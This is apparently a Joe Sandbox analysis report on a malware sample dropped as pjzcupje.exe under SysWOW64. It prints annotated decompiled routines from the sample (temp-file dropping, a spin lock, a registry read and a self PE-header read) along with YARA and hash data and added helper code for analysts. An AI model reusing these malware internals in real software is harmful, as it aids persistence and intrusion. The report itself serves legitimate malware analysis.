                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                                                                  • String ID: flags_upd$localcfg
                                                                                                                                  • API String ID: 204374128-3505511081
                                                                                                                                  • Opcode ID: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                                                                  • Opcode Fuzzy Hash: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 43%
			// Decompiler output, annotated. The routine appears to dump the contents produced by
			// the function pointer stored at global 0x4130ac into the file named by _a4 and
			// returns the number of bytes written (0 on any failure). Role of the helpers is inferred:
			// E0040EBCC(size) allocates a heap buffer, E0040EC2E(ptr) frees it.
			E00406BA7(CHAR* _a4) {
				long _v8;       // size reported / written by the callback at 0x4130ac
				long _v12;      // bytes written by WriteFile
				long _t14;      // return value
				int _t19;       // WriteFile result
				void* _t28;     // heap buffer
				void* _t39;     // file handle

				_push(_t30);
				// Only proceed if the global pointer refers to readable code.
				if(IsBadCodePtr( *0x4130ac) == 0) {
					// First call with a NULL buffer: asks the callback for the required size (in _v8).
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							// Second call with the allocated buffer: callback fills it.
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								// 0x40000000 = GENERIC_WRITE, share mode 0, 2 = CREATE_ALWAYS, 0x80 = FILE_ATTRIBUTE_NORMAL
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {   // INVALID_HANDLE_VALUE
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;   // success: report size written
									} else {
										// Write failed: close and remove the partially written file.
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3609698214-0
                                                                                                                                  • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                                                                  • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 63%
			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				// _a4: NUL-terminated data to drop; _a8: receives the generated path.
				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				// Four values from E0040ECA5() reduced mod 9 (digits 0..8) are pushed
				// together with the temp path as wsprintfA arguments. E00402544 appears
				// to decode the format string into the 0x4122f8 buffer at run time, so
				// the exact file-name pattern is not visible in this listing.
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				// Zero-fill the 0x100-byte decode buffer once the string has been used.
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				// GENERIC_WRITE (0x40000000), no sharing, CREATE_ALWAYS (2): an existing file is overwritten.
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					// INVALID_HANDLE_VALUE is -1, so the signed comparison catches it too.
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








Instruction addresses per C line: 0x0040907b 0x00409088 0x0040908e 0x00409095 0x0040909c 0x004090a8 0x004090b4 0x004090c9 0x004090ca 0x004090e9 0x004090f8 0x00409114 0x00409118 0x00000000 0x0040913f 0x0040912d 0x00409134 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                                                                  • wsprintfA.USER32 ref: 004090E9
                                                                                                                                  • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2439722600-0
                                                                                                                                  • Opcode ID: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                                                                  • Opcode Fuzzy Hash: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
			E0040DD05() {
				long _t4;
				long _t10;

				// Re-entrant spin lock over three globals: *0x4136b4 is the lock word,
				// *0x4136b8 the owning thread id, *0x4136bc the recursion depth.
				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						// Held by another thread: Sleep(0) and retry, but once 0x2710 ms
						// (10 s) have passed, reset the depth and take the lock anyway.
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					// Same thread (recursive acquire) or timeout expired: fall into L7.
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				// Lock word was 0: uncontended acquire.
				goto L7;
			}





Instruction addresses per C line: 0x0040dd17 0x0040dd41 0x0040dd2c 0x0040dd37 0x0040dd4c 0x0040dd39 0x0040dd3b 0x00000000 0x0040dd3b 0x0040dd37 0x0040dd53 0x0040dd53 0x0040dd59 0x0040dd62 0x0040dd68 0x0040dd68 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                                                                  • Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0040E538,?,761B43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                                                                  • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3819781495-0
                                                                                                                                  • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                                                                  • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
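The lock routine E0040DD05 above is a re-entrant spin lock whose contention path stops waiting after 10 s and takes the lock away from whichever thread holds it. The following is an added example, not code from the report or from the sample: a portable C model of that logic in which GetTickCount, GetCurrentThreadId, InterlockedExchange and Sleep(0) are replaced by injectable hooks, so the timeout steal can be shown deterministically. The struct and function names, the simulated clock and its 100 ms step per yield are this example's own assumptions; only the acquire/steal logic follows the decompiled routine.

```c
#include <stdint.h>
#include <stdio.h>

#define LOCK_TIMEOUT_MS 10000u          /* 0x2710 in E0040DD05 */

/* The three globals the routine touches (0x4136b4 / 0x4136b8 / 0x4136bc). */
struct tofsee_lock {
    long     flag;        /* 0 = free, 1 = taken */
    uint32_t owner_tid;   /* thread id of the current holder */
    uint32_t depth;       /* recursion count */
};

/* Hooks standing in for GetTickCount, GetCurrentThreadId and Sleep(0), so a
 * test can drive the clock and the calling thread id deterministically
 * (assumed interface, not part of the sample). */
struct lock_env {
    uint32_t (*tick)(void *ctx);
    uint32_t (*tid)(void *ctx);
    void     (*yield)(void *ctx);
    void     *ctx;
};

/* Single-threaded stand-in for InterlockedExchange; returns the old value. */
static long xchg(long *p, long v) { long old = *p; *p = v; return old; }

/* Returns 1 for a normal or re-entrant acquire, 2 when the lock was taken
 * away from another thread after the timeout. Like the original it never
 * gives up, so it never returns 0. */
int tofsee_lock_acquire(struct tofsee_lock *l, const struct lock_env *e)
{
    uint32_t start = e->tick(e->ctx);
    int stolen = 0;

    while (xchg(&l->flag, 1) != 0) {
        if (e->tid(e->ctx) == l->owner_tid)
            break;                                  /* same thread: re-enter */
        if (e->tick(e->ctx) - start >= LOCK_TIMEOUT_MS) {
            l->depth = 0;                           /* *0x4136bc = 0 */
            stolen = 1;
            break;                                  /* then fall into L7 */
        }
        e->yield(e->ctx);                           /* Sleep(0) and retry */
    }
    /* L7: record ourselves as owner and bump the depth. */
    l->owner_tid = e->tid(e->ctx);
    l->depth++;
    return stolen ? 2 : 1;
}

/* Simulated environment: the clock advances only when a thread yields. */
struct sim { uint32_t now; uint32_t tid; uint32_t step_ms; unsigned yields; };
static uint32_t sim_tick(void *c)  { return ((struct sim *)c)->now; }
static uint32_t sim_tid(void *c)   { return ((struct sim *)c)->tid; }
static void     sim_yield(void *c) { struct sim *s = c; s->now += s->step_ms; s->yields++; }

struct scenario_result {
    int rc_first, rc_reentrant, rc_contender;
    uint32_t depth_after_reentry, depth_after_steal, owner_after_steal;
    unsigned yields_before_steal;
};

/* Constructed scenario: thread 1 takes the lock twice, then thread 2 contends
 * while each Sleep(0) advances the simulated clock by 100 ms. */
struct scenario_result tofsee_lock_scenario(void)
{
    struct tofsee_lock lock = { 0, 0, 0 };
    struct sim s = { 1000, 1, 100, 0 };
    struct lock_env env = { sim_tick, sim_tid, sim_yield, &s };
    struct scenario_result r;

    r.rc_first = tofsee_lock_acquire(&lock, &env);
    r.rc_reentrant = tofsee_lock_acquire(&lock, &env);
    r.depth_after_reentry = lock.depth;             /* 2: re-entry is counted */

    s.tid = 2;
    r.rc_contender = tofsee_lock_acquire(&lock, &env);
    r.yields_before_steal = s.yields;               /* 100 yields x 100 ms = 10 s */
    r.depth_after_steal = lock.depth;               /* reset to 0, then incremented to 1 */
    r.owner_after_steal = lock.owner_tid;           /* 2, although thread 1 never released */
    return r;
}

int main(void)
{
    struct scenario_result r = tofsee_lock_scenario();
    printf("first=%d reentrant=%d depth=%u | contender=%d after %u yields, depth=%u owner=%u\n",
           r.rc_first, r.rc_reentrant, (unsigned)r.depth_after_reentry,
           r.rc_contender, r.yields_before_steal,
           (unsigned)r.depth_after_steal, (unsigned)r.owner_after_steal);
    return 0;
}
```

The point the model makes explicit: after the timeout the depth counter is reset and thread 2 becomes owner while thread 1's two outstanding acquires are still unpaired, so this is a best-effort guard against a wedged thread rather than a correct mutex. Any release routine that decrements the depth and clears the lock word when it hits zero will now be called by thread 1 against a lock it no longer owns.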

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E004080C9(int* __ecx) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				char _v52;
                                                                                                                                  				char _v312;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t31;
                                                                                                                                  				char* _t35;
                                                                                                                                  				char* _t42;
                                                                                                                                  				char* _t45;
                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                  				intOrPtr _t52;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t60;
                                                                                                                                  				intOrPtr _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				void* _t68;
                                                                                                                                  				char _t70;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  
				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					// E0040704C derives the value name (_v312, used by RegQueryValueExA below)
					// and a second string (_v52) from data at 0x410264; both must be non-empty.
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						// Decode the 0x2e-byte key path into 0x4122f8 and open it under
						// HKEY_CURRENT_USER (0x80000001) with KEY_QUERY_VALUE | KEY_WOW64_64KEY (0x101).
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							// Zero-fill the decoded key path before leaving.
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						// Size query only (no data buffer): the value must exist, be REG_SZ (1)
						// and report a non-zero byte count in _v8.
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							// Free the buffer held in *0x412c3c if one has been allocated
							// (E0040EBCC/E0040EC2E look like the allocator pair).
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							// Allocate _v8 bytes for the value data and keep the pointer in *0x412c3c.
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							_t56 =  &_v8;
                                                                                                                                  							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
                                                                                                                                  								goto L15;
                                                                                                                                  							}
                                                                                                                                  							_t49 =  &_v312;
                                                                                                                                  							_t60 = _t49 + 1;
                                                                                                                                  							do {
                                                                                                                                  								_t57 =  *_t49;
                                                                                                                                  								_t49 = _t49 + 1;
                                                                                                                                  							} while (_t57 != 0);
                                                                                                                                  							_t52 = E0040EBCC(_t49 - _t60 + 1);
                                                                                                                                  							_pop(_t56);
                                                                                                                                  							 *0x412c38 = _t52;
                                                                                                                                  							if(_t52 == 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							E0040EF00(_t52,  &_v312);
                                                                                                                                  							L17:
                                                                                                                                  							_pop(_t56);
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					E00407EE6(_t56);
                                                                                                                                  					L20:
                                                                                                                                  					_t70 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                  						_t71 =  *0x4121a4; // 0x0
                                                                                                                                  						if(_t71 == 0) {
                                                                                                                                  							_t31 = E0040675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0);
                                                                                                                                  							_t61 = _t31;
                                                                                                                                  							if(_t31 != 0) {
                                                                                                                                  								_t63 = _v20;
                                                                                                                                  								 *0x4122d4 = E004024C2(_t61, _t63, 0);
                                                                                                                                  								 *0x4121a4 = _t63;
                                                                                                                                  								E0040EC2E(_t61);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 004081BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408210
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                    • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
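The listing above shows the sample doing two things: first it opens a key under HKEY_CURRENT_USER (0x80000001) with KEY_QUERY_VALUE | KEY_WOW64_64KEY (0x101), uses the usual two-call RegQueryValueExA idiom (size query, heap allocation via E0040EBCC, data query) and only accepts a REG_SZ value (_v16 == 1); the key and value names are decoded at run time from 0x4122f8 by E00402544 and are not visible in the listing. Then, at L20, it calls E0040675C on its own dropped copy C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe, and the subcall trace (ReadFile of 0x40 bytes, SetFilePointer, ReadFile of 0xF8 bytes) matches sizeof(IMAGE_DOS_HEADER) and sizeof(IMAGE_NT_HEADERS32), i.e. it is reading the file's PE headers. The following is an added example, not code from the report or from the sample: a small Python decoder that parses Joe Sandbox API-trace lines of this form and translates the numeric arguments into their Win32 constant names. The sample lines are copied from the APIs section above; the constant tables are standard Win32/PE values; the slot index used for each argument is an assumption read off this report's lines (the trace prints stack slots, not strictly the prototype order, so RegOpenKeyExA's samDesired 0x101 sits in slot 5 here, not slot 3) and cross-checked against the decompiled calls.

```python
"""Decode numeric arguments of Joe Sandbox API-trace lines (added example).

Assumptions: SAMPLE_LINES are copied from this report; constant tables are
standard Win32 values; DECODERS slot indices were read off these lines and
checked against the decompiled calls, e.g. RegOpenKeyExA(0x80000001, _t35,
0, 0x101, &_v12). Slot positions may differ in other reports: verify them.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Trace lines copied from the report's "APIs" section.
SAMPLE_LINES = [
    "• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F",
    "• RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 004081BE",
    "  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E",
    "  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A",
    "  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807",
    "  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E",
]

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 / PE constants.
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_SAM = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
           0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
           0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
CREATE = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN", 0x4: "FILE_ATTRIBUTE_SYSTEM",
              0x20: "FILE_ATTRIBUTE_ARCHIVE", 0x80: "FILE_ATTRIBUTE_NORMAL"}
PE_SIZES = {0x40: "sizeof(IMAGE_DOS_HEADER)", 0xF8: "sizeof(IMAGE_NT_HEADERS32)"}


def flags(value, table):
    """Render a bitmask as OR-ed constant names; unknown bits stay hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def lookup(table):
    return lambda v: table.get(v, hex(v))


def bits(table):
    return lambda v: flags(v, table)


# api -> {trace slot: (argument name, decoder)}; slots are empirical (see docstring).
DECODERS = {
    "RegOpenKeyExA": {0: ("hKey", lookup(HKEYS)), 5: ("samDesired", bits(REG_SAM))},
    "RegQueryValueExA": {3: ("*lpType", lookup(REG_TYPES))},   # Joe prints the pointed-to DWORD
    "SetFileAttributesA": {1: ("dwFileAttributes", bits(FILE_ATTRS))},
    "CreateFileA": {1: ("dwDesiredAccess", bits(ACCESS)), 2: ("dwShareMode", bits(SHARE)),
                    4: ("dwCreationDisposition", lookup(CREATE)), 5: ("dwFlagsAndAttributes", bits(FILE_ATTRS))},
    "ReadFile": {2: ("nNumberOfBytesToRead", lambda v: PE_SIZES.get(v, str(v)))},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                 # int per slot, None for "?" or non-numeric slots
    ref: int                   # call-site address
    subcall: Optional[int]     # enclosing subcall function, if any
    decoded: dict = field(default_factory=dict)


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"not an API trace line: {line!r}")
    args = []
    for tok in m["args"].split(","):
        try:
            args.append(int(tok.strip(), 16))
        except ValueError:
            args.append(None)
    return ApiCall(api=m["api"], module=m["mod"], args=args, ref=int(m["ref"], 16),
                   subcall=int(m["sub"], 16) if m["sub"] else None)


def decode(call):
    for slot, (name, fn) in DECODERS.get(call.api, {}).items():
        if slot < len(call.args) and isinstance(call.args[slot], int):
            call.decoded[name] = fn(call.args[slot])
    return call


def analyse(lines):
    return [decode(parse_line(line)) for line in lines]


if __name__ == "__main__":
    for c in analyse(SAMPLE_LINES):
        where = f"{c.ref:08X}" + (f" (in sub_{c.subcall:08X})" if c.subcall else "")
        print(f"{where}  {c.api}  {c.decoded}")
```

Running this over the six sample lines prints, for instance, RegOpenKeyExA with hKey HKEY_CURRENT_USER and samDesired KEY_QUERY_VALUE|KEY_WOW64_64KEY, and the two ReadFile calls labelled sizeof(IMAGE_DOS_HEADER) and sizeof(IMAGE_NT_HEADERS32), which is the quickest way to confirm what a subcall like 0040675C is doing before reading its decompilation.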
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
                                                                                                                                  • API String ID: 124786226-910841113
                                                                                                                                  • Opcode ID: 833b6f6b4857963d3a2341c58a33919d22809719a19123417b93185de41ca30e
                                                                                                                                  • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                                                                  • Opcode Fuzzy Hash: 833b6f6b4857963d3a2341c58a33919d22809719a19123417b93185de41ca30e
                                                                                                                                  • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 0$9
                                                                                                                                  • API String ID: 3120068967-1975997740
                                                                                                                                  • Opcode ID: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction ID: 088c3d47d8d0274aa8753d7ba779fbf6fe5e7d9133052a4499599c1af462acad
                                                                                                                                  • Opcode Fuzzy Hash: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction Fuzzy Hash: D341F4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E85CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
